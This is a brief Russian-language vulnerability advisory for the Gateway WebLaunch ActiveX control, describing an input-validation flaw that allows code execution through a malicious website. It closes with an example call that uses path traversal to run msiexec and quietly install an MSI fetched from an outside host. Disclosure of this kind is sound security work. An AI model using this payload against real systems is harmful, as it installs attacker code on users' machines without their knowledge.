Программа: Gateway WebLaunch ActiveX
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в
проверке входных данных в Weblaunch.ocx и Weblaunch2.ocx.
Атакующий может обманным образом заманить пользователя на специально
составленный сайт, что приведет к выполнению произвольного кода.
Пример:
obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i
http://www.example.com/evilapp.msi /quiet");
